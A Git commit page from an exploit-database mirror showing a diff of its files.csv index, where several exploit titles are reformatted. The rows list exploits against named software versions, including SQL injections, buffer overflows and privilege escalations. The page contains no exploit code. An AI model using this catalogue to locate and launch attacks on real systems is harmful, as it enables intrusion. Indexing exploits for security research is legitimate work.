bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 08_06_2014

Browse source
This commit is contained in:
Offensive Security 2014-08-06 04:39:53 +00:00
parent 396555d345
commit 545c6bdf18
13 changed files with 1326 additions and 539 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

68
files.csv
View file

@ -4506,7 +4506,7 @@ id,file,description,date,author,platform,type,port
4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 Pass Recovery Remote SQL Injection Exploit",2008-01-08,"Eugene Minaev",php,webapps,0
4864,platforms/php/webapps/4864.txt,"Zero CMS 1.0 - Alpha Arbitrary File Upload / SQL Injection Vulnerabilities",2008-01-08,KiNgOfThEwOrLd,php,webapps,0
4865,platforms/php/webapps/4865.txt,"evilboard 0.1a (sql/xss) Multiple Vulnerabilities",2008-01-08,seaofglass,php,webapps,0
4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing Remote Stack Overflow Exploit",2008-01-08,ryujin,windows,remote,0
4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing - Remote Stack Overflow Exploit",2008-01-08,ryujin,windows,remote,0
4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 (id_actividad) Remote SQL Injection Exploit",2008-01-08,ka0x,php,webapps,0
4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - SEH Overwrite Exploit",2008-01-08,Elazar,windows,remote,0
4869,platforms/windows/remote/4869.html,"Gateway Weblaunch ActiveX Control Insecure Method Exploit",2008-01-08,Elazar,windows,remote,0
@ -4870,7 +4870,7 @@ id,file,description,date,author,platform,type,port
5232,platforms/php/webapps/5232.txt,"Mapbender <= 2.4.4 (mapFiler.php) Remote Code Execution Vulnerability",2008-03-11,"RedTeam Pentesting",php,webapps,0
5233,platforms/php/webapps/5233.txt,"Mapbender 2.4.4 - (gaz) Remote SQL Injection Vulnerability",2008-03-11,"RedTeam Pentesting",php,webapps,0
5234,platforms/php/webapps/5234.txt,"Bloo <= 1.00 Multiple Remote SQL Injection Vulnerabilities",2008-03-11,MhZ91,php,webapps,0
5235,platforms/windows/dos/5235.py,"MailEnable SMTP Service VRFY/EXPN Command Buffer Overflow DoS",2008-03-11,ryujin,windows,dos,0
5235,platforms/windows/dos/5235.py,"MailEnable SMTP Service - VRFY/EXPN Command Buffer Overflow DoS",2008-03-11,ryujin,windows,dos,0
5236,platforms/php/webapps/5236.txt,"phpBB Mod FileBase (id) Remote SQL Injection Vulnerability",2008-03-11,t0pP8uZz,php,webapps,0
5237,platforms/php/webapps/5237.txt,"Joomla Component ProductShowcase <= 1.5 - SQL Injection Vulnerability",2008-03-11,S@BUN,php,webapps,0
5238,platforms/windows/remote/5238.py,"Motorola Timbuktu Pro 8.6.5/8.7 Path Traversal / Log Injection Exploit",2008-03-11,"Core Security",windows,remote,0
@ -4883,7 +4883,7 @@ id,file,description,date,author,platform,type,port
5245,platforms/php/webapps/5245.txt,"XOOPS Module tutorials (printpage.php) SQL Injection Vulnerability",2008-03-12,S@BUN,php,webapps,0
5246,platforms/php/webapps/5246.txt,"easycalendar <= 4.0tr Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0
5247,platforms/php/webapps/5247.txt,"easygallery <= 5.0tr Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0
5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 (FETCH) Remote Buffer Overflow Exploit",2008-03-13,ryujin,windows,remote,143
5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 - (FETCH) Remote Buffer Overflow Exploit",2008-03-13,ryujin,windows,remote,143
5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent <= 3.13 (Fetch) post-auth Remote BOF Exploit",2008-03-14,haluznik,windows,remote,0
5250,platforms/windows/local/5250.cpp,"VLC <= 0.8.6e Subtitle Parsing Local Buffer Overflow Exploit",2008-03-14,"Mai Xuan Cuong",windows,local,0
5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces - (lid) Remote SQL Injection Vulnerability",2008-03-14,S@BUN,php,webapps,0
@ -4893,7 +4893,7 @@ id,file,description,date,author,platform,type,port
5256,platforms/php/webapps/5256.pl,"AuraCMS <= 2.2.1 (online.php) Remote Blind SQL Injection Exploit",2008-03-14,NTOS-Team,php,webapps,0
5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit",2008-03-14,kingcope,multiple,remote,0
5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster rpc.metad Denial of Service PoC",2008-03-14,kingcope,solaris,dos,0
5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 IMAP post-auth Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143
5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP post-auth Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143
5260,platforms/php/webapps/5260.txt,"fuzzylime cms <= 3.01 (admindir) Remote File Inclusion Vulnerability",2008-03-14,irk4z,php,webapps,0
5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow PoC",2008-03-15,"Wiktor Sierocinski",windows,dos,0
5262,platforms/php/webapps/5262.txt,"mutiple timesheets <= 5.0 - Multiple Vulnerabilities",2008-03-16,JosS,php,webapps,0
@ -5371,7 +5371,7 @@ id,file,description,date,author,platform,type,port
5748,platforms/php/webapps/5748.txt,"Joomla Component JoomlaDate (user) SQL injection Vulnerability",2008-06-05,His0k4,php,webapps,0
5749,platforms/multiple/dos/5749.pl,"Asterisk (SIP channel driver / in pedantic mode) Remote Crash Exploit",2008-06-05,"Armando Oliveira",multiple,dos,0
5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK (BIDIB.ocx) Multiple Vulns",2008-06-05,shinnai,windows,remote,0
5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 (Post Auth) Remote SEH Overflow Exploit",2008-06-06,ryujin,windows,remote,22
5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Post Auth) Remote SEH Overflow Exploit",2008-06-06,ryujin,windows,remote,22
5752,platforms/php/webapps/5752.pl,"Joomla Component GameQ <= 4.0 - Remote SQL injection Vulnerability",2008-06-07,His0k4,php,webapps,0
5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection Vulnerability",2008-06-08,Zigma,asp,webapps,0
5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 (lfi/xss) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0
@ -8425,7 +8425,7 @@ id,file,description,date,author,platform,type,port
8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 (deleteTorrent) Delete Arbitrary File Vulnerability",2009-06-11,Br0ly,php,webapps,0
8932,platforms/php/webapps/8932.txt,"yogurt 0.3 (xss/SQL Injection) Multiple Vulnerabilities",2009-06-11,Br0ly,php,webapps,0
8933,platforms/php/webapps/8933.php,"Sniggabo CMS (article.php id) Remote SQL Injection Exploit",2009-06-11,Lidloses_Auge,php,webapps,0
8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 (itms/itcp) Remote Buffer Overflow Exploit (win)",2009-06-12,ryujin,windows,remote,0
8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 - (itms/itcp) Remote Buffer Overflow Exploit (win)",2009-06-12,ryujin,windows,remote,0
8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 (Auth Bypass) SQL Injection Vulnerability",2009-06-12,ByALBAYX,php,webapps,0
8936,platforms/php/webapps/8936.txt,"4images <= 1.7.7 Filter Bypass HTML Injection/XSS Vulnerability",2009-06-12,Qabandi,php,webapps,0
8937,platforms/php/webapps/8937.txt,"campus virtual-lms (xss/SQL Injection) Multiple Vulnerabilities",2009-06-12,Yasión,php,webapps,0
@ -9425,7 +9425,7 @@ id,file,description,date,author,platform,type,port
10059,platforms/jsp/webapps/10059.txt,"McAfee Network Security Manager < 5.1.11.8.1 - Information Disclosure Vulnerability",2009-11-12,"Daniel King",jsp,webapps,0
10060,platforms/linux/local/10060.sh,"Geany .18 Local File Overwrite",2009-10-06,"Jeremy Brown",linux,local,0
10061,platforms/jsp/webapps/10061.txt,"McAfee Network Security Manager < 5.1.11.8.1 - Multiple Cross Site Scripting Vulnerabilities",2009-11-12,"Daniel King",jsp,webapps,0
10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389
10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 - nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389
10064,platforms/php/webapps/10064.txt,"Joomla CB Resume Builder - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0
10067,platforms/php/webapps/10067.txt,"Joomla Soundset 1.0 - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0
10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution",2009-11-12,"H D Moore",windows,dos,0
@ -9457,7 +9457,7 @@ id,file,description,date,author,platform,type,port
10095,platforms/multiple/remote/10095.txt,"Samba 3.0.10 - 3.3.5 Format String And Security Bypass Vulnerabilities",2009-11-13,"Jeremy Allison",multiple,remote,0
10096,platforms/php/webapps/10096.txt,"OS Commerce 2.2r2 authentication bypass",2009-11-13,"Stuart Udall",php,webapps,0
10097,platforms/php/remote/10097.php,"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote,0
10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 iConsole Buffer Overflow",2009-11-16,ryujin,windows,remote,0
10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 - iConsole Buffer Overflow",2009-11-16,ryujin,windows,remote,0
10099,platforms/windows/remote/10099.py,"HP Power Manager Administration - Universal Buffer Overflow Exploit",2009-11-16,ryujin,windows,remote,80
10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 (LIST) Remote Denial of Service Exploit",2007-03-20,shinnai,windows,dos,21
10101,platforms/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps,0
@ -9544,7 +9544,7 @@ id,file,description,date,author,platform,type,port
10252,platforms/php/webapps/10252.txt,"Joomla Component Quick News SQL Injection Vulnerability",2009-11-30,"Don Tukulesto",php,webapps,0
10253,platforms/asp/webapps/10253.txt,"Eshopbuilde CMS SQL Injection Vulnerability",2009-11-30,Isfahan,asp,webapps,0
10254,platforms/asp/webapps/10254.txt,"Xxasp 3.3.2 - SQL Injection",2009-11-30,Secu_lab_ir,asp,webapps,0
10255,platforms/bsd/local/10255.txt,"FreeBSD Run-Time Link-Editor Local r00t Zeroday",2009-11-30,kingcope,bsd,local,0
10255,platforms/bsd/local/10255.txt,"FreeBSD Run-Time Link-Editor Local r00t (0day)",2009-11-30,kingcope,bsd,local,0
10256,platforms/php/webapps/10256.txt,"WP-Polls 2.x Incorrect Flood Filter",2009-11-30,Jbyte,php,webapps,0
10257,platforms/windows/dos/10257.py,"XM Easy Professional FTP Server 5.8.0 - Denial of Service",2009-11-30,"Mert SARICA",windows,dos,21
10258,platforms/windows/remote/10258.pl,"Golden FTP Server 4.30 File Deletion Vulnerability",2009-12-01,sharpe,windows,remote,21
@ -11114,7 +11114,7 @@ id,file,description,date,author,platform,type,port
12186,platforms/php/webapps/12186.pl,"vBulletin DoS - all version",2010-04-12,"Jim Salim",php,webapps,0
12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 beta (RFI/LFI) Multiple File Include Vulnerability",2010-04-12,"cr4wl3r ",php,webapps,0
12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - format string vulnerability",2010-04-12,"Alexey Sintsov",multiple,dos,0
12189,platforms/windows/local/12189.php,"PHP 6.0 Dev str_transliterate() Buffer overflow - NX + ASLR Bypass",2010-04-13,ryujin,windows,local,0
12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
12190,platforms/php/webapps/12190.txt,"Joomla Component Jvehicles (aid) SQL Injection Vulnerability",2010-04-13,"Don Tukulesto",php,webapps,0
12191,platforms/php/webapps/12191.txt,"joomla component com_jp_jobs 1.2.0 - (id) SQL Injection Vulnerability",2010-04-13,v3n0m,php,webapps,0
12192,platforms/php/webapps/12192.txt,"blog system <= 1.5 - Multiple Vulnerabilities",2010-04-13,"cp77fk4r ",php,webapps,0
@ -11297,7 +11297,7 @@ id,file,description,date,author,platform,type,port
12402,platforms/php/webapps/12402.txt,"Kasseler CMS 2.0.5 - Bypass / Download Backup Vulnerability",2010-04-26,indoushka,php,webapps,0
12403,platforms/windows/local/12403.py,"IDEAL Administration 2010 10.2 - Local Buffer Overflow Exploit",2010-04-26,Dr_IDE,windows,local,0
12404,platforms/windows/local/12404.py,"IDEAL Migration 2009 4.5.1 - Local Buffer Overflow Exploit",2010-04-26,Dr_IDE,windows,local,0
12406,platforms/windows/local/12406.py,"Avast! 4.7 aavmker4.sys privilege escalation",2010-04-27,ryujin,windows,local,0
12406,platforms/windows/local/12406.py,"Avast! 4.7 - aavmker4.sys Privilege Escalation",2010-04-27,ryujin,windows,local,0
12407,platforms/php/webapps/12407.txt,"CMScout 2.08 SQL Injection Vulnerability",2010-04-26,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
12408,platforms/windows/dos/12408.pl,"Safari 4.0.5 (531.22.7) Denial of Service",2010-04-26,"Xss mAn",windows,dos,0
12410,platforms/php/webapps/12410.txt,"PostNuke 0.764 Module modload SQL Injection Vulnerability",2010-04-26,BILGE_KAGAN,php,webapps,0
@ -13361,7 +13361,7 @@ id,file,description,date,author,platform,type,port
15418,platforms/windows/dos/15418.html,"Internet Explorer Memory Corruption 0day Vulnerability",2010-11-04,Unknown,windows,dos,0
15419,platforms/windows/dos/15419.txt,"Acrobat Reader 9.4 - Memory Corruption Vulnerability",2010-11-04,scup,windows,dos,0
15420,platforms/windows/dos/15420.c,"Avast! Internet Security aswtdi.sys 0day Local DoS PoC",2010-11-04,"Nikita Tarakanov",windows,dos,0
15421,platforms/windows/remote/15421.html,"Internet Explorer 6, 7, 8 Memory Corruption 0day Exploit",2010-11-04,ryujin,windows,remote,0
15421,platforms/windows/remote/15421.html,"Internet Explorer 6, 7, 8 - Memory Corruption Exploit (0day)",2010-11-04,ryujin,windows,remote,0
15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit",2010-11-05,wingthor,windows,dos,0
15423,platforms/android/remote/15423.html,"Android 2.0-2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0
15426,platforms/windows/dos/15426.txt,"Adobe Flash ActionIf Integer Denial of Service Vulnerability",2010-11-05,"Matthew Bergin",windows,dos,0
@ -15573,7 +15573,7 @@ id,file,description,date,author,platform,type,port
17970,platforms/php/webapps/17970.txt,"WP-SpamFree WordPress Spam Plugin SQL Injection Vulnerability",2011-10-11,cheki,php,webapps,0
17972,platforms/php/webapps/17972.txt,"MyBB MyStatus 3.1 - SQL Injection Vulnerability",2011-10-12,Mario_Vs,php,webapps,0
17973,platforms/php/webapps/17973.txt,"WordPress GD Star Rating plugin <= 1.9.10 SQL Injection",2011-10-12,"Miroslav Stampar",php,webapps,0
17974,platforms/windows/remote/17974.html,"Mozilla Firefox Array.reduceRight() Integer Overflow Exploit",2011-10-12,ryujin,windows,remote,0
17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow Exploit",2011-10-12,ryujin,windows,remote,0
17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability",2011-10-12,metasploit,windows,remote,0
17976,platforms/windows/remote/17976.rb,"Mozilla Firefox Array.reduceRight() Integer Overflow",2011-10-13,metasploit,windows,remote,0
17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Exploit",2011-10-11,kingcope,windows,remote,0
@ -20276,14 +20276,14 @@ id,file,description,date,author,platform,type,port
23072,platforms/php/webapps/23072.txt,"Ezboard 'invitefriends.php3' Cross Site Scripting Vulnerability",2003-09-01,"David F. Madrid",php,webapps,0
23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)",2012-12-02,kingcope,windows,remote,0
23074,platforms/windows/remote/23074.txt,"IBM System Director Remote System Level Exploit",2012-12-02,kingcope,windows,remote,0
23075,platforms/linux/dos/23075.pl,"MySQL (Linux) Stack Based Buffer Overrun PoC Zeroday",2012-12-02,kingcope,linux,dos,0
23076,platforms/linux/dos/23076.pl,"MySQL (Linux) Heap Based Overrun PoC Zeroday",2012-12-02,kingcope,linux,dos,0
23077,platforms/linux/local/23077.pl,"MySQL (Linux) Database Privilege Elevation Zeroday Exploit",2012-12-02,kingcope,linux,local,0
23078,platforms/linux/dos/23078.txt,"MySQL Denial of Service Zeroday PoC",2012-12-02,kingcope,linux,dos,0
23079,platforms/windows/remote/23079.txt,"FreeFTPD Remote Authentication Bypass Zeroday Exploit",2012-12-02,kingcope,windows,remote,0
23080,platforms/windows/remote/23080.txt,"FreeSSHD Remote Authentication Bypass Zeroday Exploit",2012-12-02,kingcope,windows,remote,0
23081,platforms/multiple/remote/23081.pl,"MySQL Remote Preauth User Enumeration Zeroday",2012-12-02,kingcope,multiple,remote,0
23082,platforms/linux/remote/23082.txt,"SSH.com Communications SSH Tectia Authentication Bypass Remote Zeroday Exploit",2012-12-02,kingcope,linux,remote,0
23075,platforms/linux/dos/23075.pl,"MySQL (Linux) - Stack Based Buffer Overrun PoC (0day)",2012-12-02,kingcope,linux,dos,0
23076,platforms/linux/dos/23076.pl,"MySQL (Linux) - Heap Based Overrun PoC (0day)",2012-12-02,kingcope,linux,dos,0
23077,platforms/linux/local/23077.pl,"MySQL (Linux) - Database Privilege Elevation Exploit (0day)",2012-12-02,kingcope,linux,local,0
23078,platforms/linux/dos/23078.txt,"MySQL - Denial of Service PoC (0day)",2012-12-02,kingcope,linux,dos,0
23079,platforms/windows/remote/23079.txt,"FreeFTPD - Remote Authentication Bypass Exploit (0day)",2012-12-02,kingcope,windows,remote,0
23080,platforms/windows/remote/23080.txt,"FreeSSHD - Remote Authentication Bypass Exploit (0day)",2012-12-02,kingcope,windows,remote,0
23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Preauth User Enumeration (0day)",2012-12-02,kingcope,multiple,remote,0
23082,platforms/linux/remote/23082.txt,"SSH.com Communications SSH Tectia Authentication Bypass Remote Exploit (0day)",2012-12-02,kingcope,linux,remote,0
23083,platforms/windows/remote/23083.txt,"MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day",2012-12-02,kingcope,windows,remote,0
23084,platforms/php/webapps/23084.txt,"TSguestbook 2.1 Message Field HTML Injection Vulnerability",2003-09-01,Trash-80,php,webapps,0
23085,platforms/cgi/webapps/23085.html,"Sitebuilder 1.4 'sitebuilder.cgi' Directory Traversal File Disclosure Vulnerability",2003-09-01,"Zero X",cgi,webapps,0
@ -21608,7 +21608,7 @@ id,file,description,date,author,platform,type,port
24455,platforms/unix/remote/24455.rb,"Portable UPnP SDK unique_service_name() Remote Code Execution",2013-02-05,metasploit,unix,remote,0
24456,platforms/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps,0
24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection Vulnerability",2013-02-05,AkaStep,php,webapps,0
24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 Installation Local Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0
24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Local Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0
24459,platforms/linux/dos/24459.sh,"Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,dos,0
24460,platforms/windows/remote/24460.rb,"VMWare OVF Tools Format String Vulnerability",2013-02-06,metasploit,windows,remote,0
24461,platforms/windows/remote/24461.rb,"VMWare OVF Tools Format String Vulnerability",2013-02-12,metasploit,windows,remote,0
@ -21686,7 +21686,7 @@ id,file,description,date,author,platform,type,port
24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0
24551,platforms/php/webapps/24551.txt,"Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability",2013-02-27,EgiX,php,webapps,0
24552,platforms/php/webapps/24552.txt,"Wordpress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps,0
24555,platforms/linux/local/24555.c,"Archlinux x86-64 3.3.x-3.7.x x86-64 sock_diag_handlers[] Local Root",2013-02-27,sd,linux,local,0
24555,platforms/linux/local/24555.c,"Archlinux x86-64 3.3.x-3.7.x x86-64 - sock_diag_handlers[] Local Root",2013-02-27,sd,linux,local,0
24556,platforms/windows/dos/24556.py,"Hanso Player 2.1.0 (.m3u) - Buffer Overflow Vulnerability",2013-03-01,metacom,windows,dos,0
24557,platforms/windows/remote/24557.py,"Sami FTP Server 2.0.1 LIST Command Buffer Overflow",2013-03-01,superkojiman,windows,remote,0
24560,platforms/php/webapps/24560.txt,"doorGets CMS - CSRF Vulnerability",2013-03-01,n0pe,php,webapps,0
@ -22039,7 +22039,7 @@ id,file,description,date,author,platform,type,port
24926,platforms/hardware/webapps/24926.txt,"Multiple D-Link Devices - Multiple Vulnerabilities",2013-04-08,m-1-k-3,hardware,webapps,0
24927,platforms/php/webapps/24927.txt,"Vanilla Forums 2-0-18-4 - SQL-Injection Vulnerability",2013-04-08,bl4ckw0rm,php,webapps,0
24928,platforms/hardware/webapps/24928.txt,"TP-Link TD-8817 6.0.1 Build 111128 Rel.26763 - CSRF Vulnerability",2013-04-08,Un0wn_X,hardware,webapps,0
24929,platforms/linux/local/24929.rb,"HP System Management Homepage Local Privilege Escalation",2013-04-08,metasploit,linux,local,0
24929,platforms/linux/local/24929.rb,"HP System Management Homepage - Local Privilege Escalation",2013-04-08,metasploit,linux,local,0
24930,platforms/windows/dos/24930.txt,"Groovy Media Player 3.2.0 (.mp3) - Buffer Overflow Vulnerability",2013-04-08,"Akshaysinh Vaghela",windows,dos,0
24931,platforms/hardware/remote/24931.rb,"Netgear DGN1000B setup.cgi Remote Command Execution",2013-04-08,metasploit,hardware,remote,0
24932,platforms/linux/webapps/24932.txt,"Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities",2013-04-08,"SEC Consult",linux,webapps,0
@ -23071,7 +23071,7 @@ id,file,description,date,author,platform,type,port
25983,platforms/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 User.CFM Cross-Site Scripting Vulnerability",2005-07-14,rUnViRuS,cfm,webapps,0
25984,platforms/cfm/webapps/25984.txt,"Simple Message Board 2.0 beta1 Thread.CFM Cross-Site Scripting Vulnerability",2005-07-14,rUnViRuS,cfm,webapps,0
25985,platforms/cfm/webapps/25985.txt,"Simple Message Board 2.0 beta1 Search.CFM Cross-Site Scripting Vulnerability",2005-07-14,rUnViRuS,cfm,webapps,0
25986,platforms/php/remote/25986.txt,"Plesk < 9.5.4 - Zeroday Remote Exploit",2013-06-05,kingcope,php,remote,0
25986,platforms/php/remote/25986.txt,"Plesk < 9.5.4 - Remote Exploit (0day)",2013-06-05,kingcope,php,remote,0
25987,platforms/hardware/remote/25987.txt,"Xpient Cash Drawer Operation Vulnerability",2013-06-05,"Core Security",hardware,remote,0
25988,platforms/multiple/remote/25988.txt,"Oracle9i Application Server 9.0.2 MOD_ORADAV Access Control Vulnerability",2003-02-13,"David Litchfield",multiple,remote,0
25989,platforms/windows/remote/25989.txt,"Nullsoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow Vulnerability",2005-07-15,"Leon Juranic",windows,remote,0
@ -23522,7 +23522,7 @@ id,file,description,date,author,platform,type,port
26448,platforms/windows/local/26448.py,"AudioCoder 0.8.22 (.lst) - Direct Retn Buffer Overflow",2013-06-26,Onying,windows,local,0
26449,platforms/php/webapps/26449.txt,"e107 Advanced Medal System Plugin - SQL Injection Vulnerability",2013-06-26,"Life Wasted",php,webapps,0
26450,platforms/windows/dos/26450.pl,"Baby FTP Server 1.24 - Denial of Service",2013-06-26,Chako,windows,dos,21
26451,platforms/linux/local/26451.rb,"ZPanel zsudo Local Privilege Escalation Exploit",2013-06-26,metasploit,linux,local,0
26451,platforms/linux/local/26451.rb,"ZPanel zsudo - Local Privilege Escalation Exploit",2013-06-26,metasploit,linux,local,0
26452,platforms/win32/local/26452.rb,"Novell Client 2 SP3 nicm.sys Local Privilege Escalation",2013-06-26,metasploit,win32,local,0
26453,platforms/php/webapps/26453.py,"PHP Charts 1.0 (index.php, type param) - Remote Code Execution",2013-06-26,infodox,php,webapps,0
26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 Address Space Manipulation Privilege Escalation",2013-06-26,metasploit,freebsd,local,0
@ -24964,7 +24964,7 @@ id,file,description,date,author,platform,type,port
27932,platforms/asp/webapps/27932.txt,"Hogstorps Guestbook 2.0 Unauthorized Access Vulnerability",2006-05-01,omnipresent,asp,webapps,0
27933,platforms/php/webapps/27933.txt,"Tekno.Portal Bolum.PHP SQL Injection Vulnerability",2006-06-01,SpC-x,php,webapps,0
27934,platforms/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 Content.PHP SQL Injection Vulnerability",2006-06-01,SpC-x,php,webapps,0
27938,platforms/linux/local/27938.rb,"VMWare Setuid vmware-mount Unsafe popen(3)",2013-08-29,metasploit,linux,local,0
27938,platforms/linux/local/27938.rb,"VMWare - Setuid vmware-mount Unsafe popen(3)",2013-08-29,metasploit,linux,local,0
27939,platforms/windows/remote/27939.rb,"HP LoadRunner lrFileIOService ActiveX Remote Code Execution",2013-08-29,metasploit,windows,remote,0
27940,platforms/windows/remote/27940.rb,"Firefox XMLSerializer Use After Free",2013-08-29,metasploit,windows,remote,0
27941,platforms/php/remote/27941.rb,"SPIP connect Parameter PHP Injection",2013-08-29,metasploit,php,remote,0
@ -25344,7 +25344,7 @@ id,file,description,date,author,platform,type,port
28329,platforms/php/webapps/28329.txt,"OpenEMR 4.1.1 Patch 14 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0
28330,platforms/php/webapps/28330.txt,"Western Digital Arkeia Appliance 10.0.10 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0
28331,platforms/windows/remote/28331.txt,"Oracle Java ShortComponentRaster.verify() Memory Corruption",2013-09-17,"Packet Storm",windows,remote,0
28332,platforms/linux/local/28332.rb,"Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation",2013-09-17,metasploit,linux,local,0
28332,platforms/linux/local/28332.rb,"Sophos Web Protection Appliance - clear_keys.pl Local Privilege Escalation",2013-09-17,metasploit,linux,local,0
28333,platforms/unix/remote/28333.rb,"D-Link Devices UPnP SOAP Telnetd Command Execution",2013-09-17,metasploit,unix,remote,49152
28334,platforms/linux/remote/28334.rb,"Sophos Web Protection Appliance sblistpack Arbitrary Command Execution",2013-09-17,metasploit,linux,remote,443
28335,platforms/windows/local/28335.rb,"Agnitum Outpost Internet Security Local Privilege Escalation",2013-09-17,metasploit,windows,local,0
@ -29437,7 +29437,7 @@ id,file,description,date,author,platform,type,port
32697,platforms/linux/dos/32697.pl,"aMSN '.ctt' File Remote Denial of Service Vulnerability",2009-01-03,Hakxer,linux,dos,0
32698,platforms/php/webapps/32698.txt,"SolucionXpressPro 'main.php' SQL Injection Vulnerability",2009-01-05,Ehsan_Hp200,php,webapps,0
32699,platforms/windows/remote/32699.txt,"Google Chrome 1.0.154.36 - FTP Client PASV Port Scan Information Disclosure Vulnerability",2009-01-05,"Aditya K Sood",windows,remote,0
32700,platforms/linux/local/32700.rb,"ibstat $PATH Privilege Escalation",2014-04-04,metasploit,linux,local,0
32700,platforms/linux/local/32700.rb,"ibstat $PATH - Privilege Escalation",2014-04-04,metasploit,linux,local,0
32701,platforms/php/webapps/32701.txt,"Wordpress XCloner Plugin 3.1.0 - CSRF Vulnerability",2014-04-04,"High-Tech Bridge SA",php,webapps,80
32702,platforms/hardware/dos/32702.txt,"A10 Networks ACOS 2.7.0-P2(build: 53) - Buffer Overflow",2014-04-04,"Francesco Perna",hardware,dos,80
32703,platforms/ios/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent Vulnerability",2014-04-05,Vulnerability-Lab,ios,webapps,0
@ -30456,7 +30456,7 @@ id,file,description,date,author,platform,type,port
33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,dos,0
33805,platforms/linux/remote/33805.pl,"AlienVault OSSIM < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution",2014-06-18,"Alfredo Ramirez",linux,remote,0
33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,metasploit,multiple,remote,8888
33808,platforms/linux/local/33808.c,"docker 0.11 VMM-container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
